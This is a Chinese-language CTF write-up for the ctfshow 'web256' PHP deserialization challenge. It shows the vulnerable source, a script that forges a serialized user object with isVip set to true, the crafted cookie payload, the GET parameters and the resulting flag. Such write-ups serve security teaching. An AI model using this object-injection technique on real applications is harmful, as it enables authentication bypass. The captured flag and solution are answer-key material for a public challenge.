CTFSHOW web入门 反序列化 web256

web256

复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){  //将username和password进行比较,不相等进入里面
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}
复制代码
<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$o=new ctfShowUser();
$o->username='admin';
$o->password='password';
$o->isVip=true;
echo urlencode(serialize($o));

?>

GET

username=admin&password=password

Cookies

user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22admin%22%3Bs%3A8%3A%22password%22%3Bs%3A8%3A%22password%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

ctfshow{0a328664-3455-4a8f-865b-473c4fb136a8}

GET 请求传参进入到第一个 if 条件,符合要求,绕过 if

if(isset($username) && isset($password)){
在这里通过 COOKIE 传参,我们传入的内容进行反序列化,题目中 username 和 password 的值被更改成了 admin 和 password
$user = unserialize($_COOKIE['user']);
这进入到第二个 if 条件,他调用 login 方法,比较 username、passwor 和 u、p 进行对比,看是否相等,这里也是直接绕过了
if($user->login($username,$password)){
这里是第三个 if 条件,我们在给 user 传参的时候就修改了 isVip 的值为 true,所以这里也是直接绕过了
if($user->checkVip()){
他了这里是调用vipOneKeyGetFlag()方法,首先判断 isVip 可是 true,然后再把$flag 变成全局变量,后面是对比 username 和 password 的值可一样,这里也是直接绕过了
$user->vipOneKeyGetFlag();

本题考点:php 代码审计,php 反序列化

相关推荐
ShoreKiten1 个月前
第三届SHCTF--EZphp
web安全·php·php反序列化
pinesawfly4 个月前
[强网杯 2019]upload
web·buu·文件上传·php反序列化
Acc1oFl4g6 个月前
【铸网-2025】线下赛 web 详细题解
web安全·ctf·php反序列化
SecRIO1 年前
[SWPUCTF 2022 新生赛]1z_unserialize
php·ctf·php反序列化
摸鱼也很难1 年前
php反序列化 && ctf例题演示 框架安全(TP,Yii,Laravel)&& phpggc生成框架利用pop
php·ctf·php反序列化·审计·ctf web题目
摸鱼也很难1 年前
php反序列化进阶 && CVE (__wakeup的绕过)&&属性类型特征 && 字符串的逃逸
开发语言·php·buuctf·php反序列化
ccc_9wy1 年前
HackMyVM-Again靶机的测试报告
网络安全·php代码审计·hackmyvm靶场·again靶机·capabilities提权·修改linux文件权限·setcap
摸鱼也很难1 年前
php从入门到进阶笔记 下 &&php反序列化漏洞的演示
开发语言·笔记·php·php反序列化
网安小t2 年前
ctfshow-PHP反序列化
网络安全·渗透测试·反序列化漏洞·php反序列化·漏洞测试